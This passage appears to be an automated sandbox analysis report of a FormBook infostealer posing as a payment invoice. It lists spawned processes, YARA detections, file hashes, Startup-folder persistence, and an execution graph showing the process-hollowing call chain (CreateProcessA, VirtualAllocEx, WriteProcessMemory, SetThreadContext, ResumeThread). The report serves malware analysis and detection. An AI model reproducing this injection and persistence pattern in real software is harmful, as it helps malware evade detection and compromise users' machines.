                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.396177857.0000000001230000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.396177857.0000000001230000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.396177857.0000000001230000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        Reputation:low

                                                        General

                                                        Target ID:5
                                                        Start time:08:36:26
                                                        Start date:22/02/2023
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff69bc80000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:6
                                                        Start time:08:36:34
                                                        Start date:22/02/2023
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe"
                                                        Imagebase:0x970000
                                                        File size:37376 bytes
                                                        MD5 hash:D6460E1A62BFB5366FFF5959B99BBEDE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000006.00000002.379618522.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                        Antivirus matches:
                                                        • Detection: 5%, ReversingLabs
                                                        Reputation:low

                                                        General

                                                        Target ID:7
                                                        Start time:08:36:43
                                                        Start date:22/02/2023
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe
                                                        Imagebase:0xea0000
                                                        File size:37376 bytes
                                                        MD5 hash:D6460E1A62BFB5366FFF5959B99BBEDE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        Reputation:low

                                                        General

                                                        Target ID:8
                                                        Start time:08:36:45
                                                        Start date:22/02/2023
                                                        Path:C:\Windows\SysWOW64\ipconfig.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                        Imagebase:0xa20000
                                                        File size:29184 bytes
                                                        MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.582093453.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.582093453.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.582093453.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.581974891.0000000002CA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.581974891.0000000002CA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.581974891.0000000002CA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.582148968.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.582148968.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.582148968.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        Reputation:high

                                                        General

                                                        Target ID:9
                                                        Start time:08:36:46
                                                        Start date:22/02/2023
                                                        Path:C:\Windows\SysWOW64\autofmt.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                        Imagebase:0x870000
                                                        File size:831488 bytes
                                                        MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Target ID:10
                                                        Start time:08:36:46
                                                        Start date:22/02/2023
                                                        Path:C:\Windows\SysWOW64\ipconfig.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                        Imagebase:0xa20000
                                                        File size:29184 bytes
                                                        MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.401587314.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.401587314.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.401587314.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com

                                                        General

                                                        Target ID:12
                                                        Start time:08:37:05
                                                        Start date:22/02/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7fcd70000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:10.8%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:201
                                                          Total number of Limit Nodes:20
                                                          execution_graph 26677 6010cf0 26678 6010d0e 26677->26678 26682 6012810 26678->26682 26686 6012807 26678->26686 26679 6010d45 26683 6012869 LoadLibraryA 26682->26683 26685 60128ec 26683->26685 26687 6012810 LoadLibraryA 26686->26687 26689 60128ec 26687->26689 26427 bb42f0 26428 bb4307 26427->26428 26431 bb4411 26428->26431 26432 bb4435 26431->26432 26436 bb4510 26432->26436 26440 bb4500 26432->26440 26433 bb4313 26437 bb4537 26436->26437 26439 bb4614 26437->26439 26444 bb3e18 26437->26444 26441 bb4537 26440->26441 26442 bb4614 26441->26442 26443 bb3e18 CreateActCtxA 26441->26443 26442->26442 26443->26442 26445 bb55a0 CreateActCtxA 26444->26445 26447 bb5663 26445->26447 26448 606d998 26449 606d9b5 26448->26449 26450 606d9d0 26449->26450 26452 60194bf 26449->26452 26456 60195a0 26452->26456 26461 60194e8 26452->26461 26453 60194cb 26453->26449 26457 60195a1 26456->26457 26468 601a2f5 26457->26468 26473 601a27b 26457->26473 26458 60195a8 26458->26453 26462 601951e 26461->26462 26464 601953d 26461->26464 26462->26453 26463 6019566 26463->26453 26464->26463 26466 601a2f5 12 API calls 26464->26466 26467 601a27b 12 API calls 26464->26467 26465 60195a8 26465->26453 26466->26465 26467->26465 26470 601a29c 26468->26470 26469 601a30e 26469->26458 26470->26469 26478 601a328 26470->26478 26498 601a338 26470->26498 26474 601a29c 26473->26474 26475 601a30e 26474->26475 26476 601a328 12 API calls 26474->26476 26477 601a338 12 API calls 26474->26477 26475->26458 26476->26474 26477->26474 26479 601a332 26478->26479 26480 601a35b 26479->26480 26518 601babc 26479->26518 26523 601bf1c 26479->26523 26528 601bc1a 26479->26528 26532 601bb98 26479->26532 26537 601bd19 26479->26537 26541 601baf9 26479->26541 26550 601b94e 26479->26550 26555 601bace 26479->26555 26561 601bf2e 26479->26561 26568 601be4f 26479->26568 26573 601bfac 26479->26573 26579 601c1aa 26479->26579 26584 601bd87 26479->26584 26592 601bec7 26479->26592 26597 601c182 26479->26597 26605 601ba60 26479->26605 26609 601b93c 26479->26609 26480->26470 26499 601a34a 26498->26499 26500 601a35b 26499->26500 26501 601ba60 2 API calls 26499->26501 26502 601c182 4 API calls 26499->26502 26503 601bec7 2 API calls 26499->26503 26504 601bd87 4 API calls 26499->26504 26505 601c1aa 2 API calls 26499->26505 26506 601bfac 2 API calls 26499->26506 26507 601be4f 2 API calls 26499->26507 26508 601bf2e 4 API calls 26499->26508 26509 601bace 2 API calls 26499->26509 26510 601b94e 2 API calls 26499->26510 26511 601baf9 4 API calls 26499->26511 26512 601bd19 2 API calls 26499->26512 26513 601bb98 2 API calls 26499->26513 26514 601bc1a 2 API calls 26499->26514 26515 601bf1c 2 API calls 26499->26515 26516 601babc 2 API calls 26499->26516 26517 601b93c 2 API calls 26499->26517 26500->26470 26501->26499 26502->26499 26503->26499 26504->26499 26505->26499 26506->26499 26507->26499 26508->26499 26509->26499 26510->26499 26511->26499 26512->26499 26513->26499 26514->26499 26515->26499 26516->26499 26517->26499 26520 601b865 26518->26520 26519 601b89b 26519->26479 26519->26519 26520->26519 26614 601a660 26520->26614 26618 601a668 26520->26618 26524 601b865 26523->26524 26525 601b89b 26524->26525 26526 601a660 WriteProcessMemory 26524->26526 26527 601a668 WriteProcessMemory 26524->26527 26525->26479 26526->26524 26527->26524 26530 601a660 WriteProcessMemory 26528->26530 26531 601a668 WriteProcessMemory 26528->26531 26529 601bc3e 26529->26479 26530->26529 26531->26529 26533 601b865 26532->26533 26534 601b89b 26533->26534 26535 601a660 WriteProcessMemory 26533->26535 26536 601a668 WriteProcessMemory 26533->26536 26534->26479 26535->26533 26536->26533 26622 601af62 26537->26622 26625 601af68 26537->26625 26538 601bd37 26628 601c630 26541->26628 26637 601c640 26541->26637 26542 601baff 26546 601c630 4 API calls 26542->26546 26547 601c640 4 API calls 26542->26547 26543 601bfc5 26548 601c630 4 API calls 26543->26548 26549 601c640 4 API calls 26543->26549 26546->26543 26547->26543 26548->26543 26549->26543 26551 601b865 26550->26551 26552 601b89b 26551->26552 26553 601a660 WriteProcessMemory 26551->26553 26554 601a668 WriteProcessMemory 26551->26554 26552->26479 26553->26551 26554->26551 26556 601ba73 26555->26556 26557 601bad3 26555->26557 26558 601ba84 26556->26558 26661 601a83e 26556->26661 26665 601a840 26556->26665 26562 601bf36 26561->26562 26564 601c630 4 API calls 26562->26564 26565 601c640 4 API calls 26562->26565 26563 601bfc5 26566 601c630 4 API calls 26563->26566 26567 601c640 4 API calls 26563->26567 26564->26563 26565->26563 26566->26563 26567->26563 26569 601b865 26568->26569 26569->26568 26570 601b89b 26569->26570 26571 601a660 WriteProcessMemory 26569->26571 26572 601a668 WriteProcessMemory 26569->26572 26570->26479 26571->26569 26572->26569 26574 601bfb4 26573->26574 26575 601b865 26573->26575 26574->26574 26576 601b89b 26575->26576 26577 601a660 WriteProcessMemory 26575->26577 26578 601a668 WriteProcessMemory 26575->26578 26576->26479 26576->26576 26577->26575 26578->26575 26580 601c1bb 26579->26580 26582 601a660 WriteProcessMemory 26580->26582 26583 601a668 WriteProcessMemory 26580->26583 26581 601c1d6 26582->26581 26583->26581 26585 601bd90 26584->26585 26669 6019ef8 26585->26669 26673 6019eef 26585->26673 26593 601b865 26592->26593 26594 601b89b 26593->26594 26595 601a660 WriteProcessMemory 26593->26595 26596 601a668 WriteProcessMemory 26593->26596 26594->26479 26595->26593 26596->26593 26598 601bfdd 26597->26598 26599 601b865 26597->26599 26603 6019ef8 CreateProcessA 26598->26603 26604 6019eef CreateProcessA 26598->26604 26600 601b89b 26599->26600 26601 601a660 WriteProcessMemory 26599->26601 26602 601a668 WriteProcessMemory 26599->26602 26600->26479 26601->26599 26602->26599 26603->26599 26604->26599 26607 601a840 VirtualAllocEx 26605->26607 26608 601a83e VirtualAllocEx 26605->26608 26606 601ba84 26607->26606 26608->26606 26610 601b865 26609->26610 26611 601b89b 26610->26611 26612 601a660 WriteProcessMemory 26610->26612 26613 601a668 WriteProcessMemory 26610->26613 26611->26479 26612->26610 26613->26610 26615 601a668 WriteProcessMemory 26614->26615 26617 601a707 26615->26617 26617->26520 26619 601a6b0 WriteProcessMemory 26618->26619 26621 601a707 26619->26621 26621->26520 26623 601afbf ReadProcessMemory 26622->26623 26624 601aff0 26623->26624 26624->26538 26626 601afbf ReadProcessMemory 26625->26626 26627 601aff0 26626->26627 26627->26538 26629 601c640 26628->26629 26645 601aba0 26629->26645 26649 601ab99 26629->26649 26630 601c661 26631 601c66d 26630->26631 26653 6012ac0 26630->26653 26657 6012ab8 26630->26657 26631->26542 26632 601c718 26632->26542 26643 601aba0 SetThreadContext 26637->26643 26644 601ab99 SetThreadContext 26637->26644 26638 601c661 26639 601c66d 26638->26639 26641 6012ac0 ResumeThread 26638->26641 26642 6012ab8 ResumeThread 26638->26642 26639->26542 26640 601c718 26640->26542 26641->26640 26642->26640 26643->26638 26644->26638 26646 601abe5 SetThreadContext 26645->26646 26648 601ac2d 26646->26648 26648->26630 26650 601abe5 SetThreadContext 26649->26650 26652 601ac2d 26650->26652 26652->26630 26654 6012ac1 ResumeThread 26653->26654 26656 6012b31 26654->26656 26656->26632 26658 6012abc ResumeThread 26657->26658 26660 6012b31 26658->26660 26660->26632 26662 601a840 VirtualAllocEx 26661->26662 26664 601a8bd 26662->26664 26664->26558 26666 601a880 VirtualAllocEx 26665->26666 26668 601a8bd 26666->26668 26668->26558 26670 6019f81 CreateProcessA 26669->26670 26672 601a143 26670->26672 26672->26672 26674 6019f81 CreateProcessA 26673->26674 26676 601a143 26674->26676

                                                          Executed Functions

                                                          Function 00BB9360 Relevance: 2.2, Strings: 1, Instructions: 961COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.333136502.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_bb0000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: KbNq^
                                                          • API String ID: 0-826545432
                                                          • Opcode ID: f3af0814fb919c87b791643e94195b7068e7b9189098f808d2d392444a99e8ed
                                                          • Instruction ID: b89a5b976008b384b6b1590faaae07e3b33fe3b0c31ddc2ac6be1f9025b78e97
                                                          • Opcode Fuzzy Hash: f3af0814fb919c87b791643e94195b7068e7b9189098f808d2d392444a99e8ed
                                                          • Instruction Fuzzy Hash: EB921874A00214CFCB24DF68D994BA9BBF2FF89300F2585A9D50A9B365DB70ED81CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06060936 Relevance: 1.0, Instructions: 988COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342194829.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6060000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 09026d928fcaa6fd5fe532d4fdc54355f1153a30537f395fdfb80fbe05ae174e
                                                          • Instruction ID: 2706eab2848bee18d2bc76bcb81a55747ec452ec00a8361856c8a5731dc09cff
                                                          • Opcode Fuzzy Hash: 09026d928fcaa6fd5fe532d4fdc54355f1153a30537f395fdfb80fbe05ae174e
                                                          • Instruction Fuzzy Hash: 1B32FE3D587512BFC3708E71EC47DEBBFADEF49251B144549F886A6112DA3089C28AF2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06016E40 Relevance: .3, Instructions: 338COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79b7466a62082c38027820d8f94b17feda5c4c3507285892ccbf471ae4c0cb98
                                                          • Instruction ID: 14e676f0b48aa263c2bc2d45a79e0306f23f01ecae8bf467154163f983e92fe0
                                                          • Opcode Fuzzy Hash: 79b7466a62082c38027820d8f94b17feda5c4c3507285892ccbf471ae4c0cb98
                                                          • Instruction Fuzzy Hash: 85D15C71E40209CFCB54DFA8C884AAEFBF1FF88314F14856AE455AB251DB35E946CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06014EE0 Relevance: .3, Instructions: 281COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd6d5556415818586341e90880002bcd427882e92888ef1b09806bec31dc01e4
                                                          • Instruction ID: 9b5aa88724a4c1566f0ad0b4ec0f4b136e7f3fe7dcab42fe0285e8d0845aac3e
                                                          • Opcode Fuzzy Hash: fd6d5556415818586341e90880002bcd427882e92888ef1b09806bec31dc01e4
                                                          • Instruction Fuzzy Hash: E5B15CB1E402098FDF91CFA9D9857DEBBF2BF88704F148129E815AF294DB749845CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 060157B0 Relevance: .3, Instructions: 266COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8dfea27a50f207153c25e73705579820d7d8e0351c10acaca5cacfc2bc63a0a7
                                                          • Instruction ID: 2b0eaf0076d5c7dc6c0ce5b6f895365d8be8dae129ce5e792ed90e6f8fd5a054
                                                          • Opcode Fuzzy Hash: 8dfea27a50f207153c25e73705579820d7d8e0351c10acaca5cacfc2bc63a0a7
                                                          • Instruction Fuzzy Hash: 56B17CB0E50209CFDB91CFA9CC9179EBFF2AF88714F148529D814AF254EB749885CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06019EEF Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 285 6019eef-6019f8d 287 6019fc6-6019fe6 285->287 288 6019f8f-6019f99 285->288 293 6019fe8-6019ff2 287->293 294 601a01f-601a04e 287->294 288->287 289 6019f9b-6019f9d 288->289 290 6019fc0-6019fc3 289->290 291 6019f9f-6019fa9 289->291 290->287 295 6019fab 291->295 296 6019fad-6019fbc 291->296 293->294 297 6019ff4-6019ff6 293->297 304 601a050-601a05a 294->304 305 601a087-601a141 CreateProcessA 294->305 295->296 296->296 298 6019fbe 296->298 299 601a019-601a01c 297->299 300 6019ff8-601a002 297->300 298->290 299->294 302 601a004 300->302 303 601a006-601a015 300->303 302->303 303->303 306 601a017 303->306 304->305 307 601a05c-601a05e 304->307 316 601a143-601a149 305->316 317 601a14a-601a1d0 305->317 306->299 309 601a081-601a084 307->309 310 601a060-601a06a 307->310 309->305 311 601a06c 310->311 312 601a06e-601a07d 310->312 311->312 312->312 314 601a07f 312->314 314->309 316->317 327 601a1e0-601a1e4 317->327 328 601a1d2-601a1d6 317->328 330 601a1f4-601a1f8 327->330 331 601a1e6-601a1ea 327->331 328->327 329 601a1d8 328->329 329->327 333 601a208-601a20c 330->333 334 601a1fa-601a1fe 330->334 331->330 332 601a1ec 331->332 332->330 336 601a21e-601a225 333->336 337 601a20e-601a214 333->337 334->333 335 601a200 334->335 335->333 338 601a227-601a236 336->338 339 601a23c 336->339 337->336 338->339 341 601a23d 339->341 341->341
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0601A12E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: f2eb5ca7c657aad1e950258245bc1f56dfb15bc1c7c6def09be7c33427c07694
                                                          • Instruction ID: 9a5e7a1acdddbad7dd813d0594b882b7bef1cf02fa7cd15e82c21bfe2fc2afb4
                                                          • Opcode Fuzzy Hash: f2eb5ca7c657aad1e950258245bc1f56dfb15bc1c7c6def09be7c33427c07694
                                                          • Instruction Fuzzy Hash: A6916E71E412198FDF91CF68C880BDDBBF2BF48314F0485A9E859AB240DB759985CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06019EF8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 342 6019ef8-6019f8d 344 6019fc6-6019fe6 342->344 345 6019f8f-6019f99 342->345 350 6019fe8-6019ff2 344->350 351 601a01f-601a04e 344->351 345->344 346 6019f9b-6019f9d 345->346 347 6019fc0-6019fc3 346->347 348 6019f9f-6019fa9 346->348 347->344 352 6019fab 348->352 353 6019fad-6019fbc 348->353 350->351 354 6019ff4-6019ff6 350->354 361 601a050-601a05a 351->361 362 601a087-601a141 CreateProcessA 351->362 352->353 353->353 355 6019fbe 353->355 356 601a019-601a01c 354->356 357 6019ff8-601a002 354->357 355->347 356->351 359 601a004 357->359 360 601a006-601a015 357->360 359->360 360->360 363 601a017 360->363 361->362 364 601a05c-601a05e 361->364 373 601a143-601a149 362->373 374 601a14a-601a1d0 362->374 363->356 366 601a081-601a084 364->366 367 601a060-601a06a 364->367 366->362 368 601a06c 367->368 369 601a06e-601a07d 367->369 368->369 369->369 371 601a07f 369->371 371->366 373->374 384 601a1e0-601a1e4 374->384 385 601a1d2-601a1d6 374->385 387 601a1f4-601a1f8 384->387 388 601a1e6-601a1ea 384->388 385->384 386 601a1d8 385->386 386->384 390 601a208-601a20c 387->390 391 601a1fa-601a1fe 387->391 388->387 389 601a1ec 388->389 389->387 393 601a21e-601a225 390->393 394 601a20e-601a214 390->394 391->390 392 601a200 391->392 392->390 395 601a227-601a236 393->395 396 601a23c 393->396 394->393 395->396 398 601a23d 396->398 398->398
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0601A12E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: bb25234c62c964cc6952d0df6bdc437c2e7fc80f3d41c2b0a9d85c81a26599e8
                                                          • Instruction ID: bba102023c9c85aaefa8f9890824e8041e44833b7dfee1f06624dc755c9e3d11
                                                          • Opcode Fuzzy Hash: bb25234c62c964cc6952d0df6bdc437c2e7fc80f3d41c2b0a9d85c81a26599e8
                                                          • Instruction Fuzzy Hash: 5A917E71E412198FDF90CF69C840BDDBBF2BF48314F0485A9E819AB240DB759985CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00BB3E18 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 399 bb3e18-bb5661 CreateActCtxA 402 bb566a-bb56c4 399->402 403 bb5663-bb5669 399->403 410 bb56d3-bb56d7 402->410 411 bb56c6-bb56c9 402->411 403->402 412 bb56d9-bb56e5 410->412 413 bb56e8 410->413 411->410 412->413 414 bb56e9 413->414 414->414
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00BB5651
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.333136502.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_bb0000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: be68b3279f0e87c4af36a4568d1657985ce62a65085e30eaf44b43b875b249b6
                                                          • Instruction ID: aee6ca3766d570ed32bcabe0ed8eacb36d0e2c61d36bdf3672bb5d8b93e1c6bf
                                                          • Opcode Fuzzy Hash: be68b3279f0e87c4af36a4568d1657985ce62a65085e30eaf44b43b875b249b6
                                                          • Instruction Fuzzy Hash: 0441C1B1C0061DCFDB24DFA9C8847DDBBB5BF48704F6080AAD409AB261D7B56945CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00BB5595 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 416 bb5595-bb561b 417 bb5623-bb5661 CreateActCtxA 416->417 418 bb566a-bb56c4 417->418 419 bb5663-bb5669 417->419 426 bb56d3-bb56d7 418->426 427 bb56c6-bb56c9 418->427 419->418 428 bb56d9-bb56e5 426->428 429 bb56e8 426->429 427->426 428->429 430 bb56e9 429->430 430->430
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00BB5651
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.333136502.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_bb0000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: f371c6d9bdedc1865177a6e688a3f00509fc617951c2caba0282fac775e1967a
                                                          • Instruction ID: 3e1c5510dd157532696951f9c4c86401b9a3c5d675e1709e3f4082b8dbba9181
                                                          • Opcode Fuzzy Hash: f371c6d9bdedc1865177a6e688a3f00509fc617951c2caba0282fac775e1967a
                                                          • Instruction Fuzzy Hash: 1841D2B1C0061DCFDB24DFA9C9887DEBBB5BF48304F2480AAD409AB251D7B56945CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06012807 Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 432 6012807-6012867 434 60128a0-60128ea LoadLibraryA 432->434 435 6012869-6012873 432->435 442 60128f3-6012924 434->442 443 60128ec-60128f2 434->443 435->434 436 6012875-6012877 435->436 437 6012879-6012883 436->437 438 601289a-601289d 436->438 440 6012885 437->440 441 6012887-6012896 437->441 438->434 440->441 441->441 445 6012898 441->445 447 6012934 442->447 448 6012926-601292a 442->448 443->442 445->438 450 6012935 447->450 448->447 449 601292c 448->449 449->447 450->450
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.342143956.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6010000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
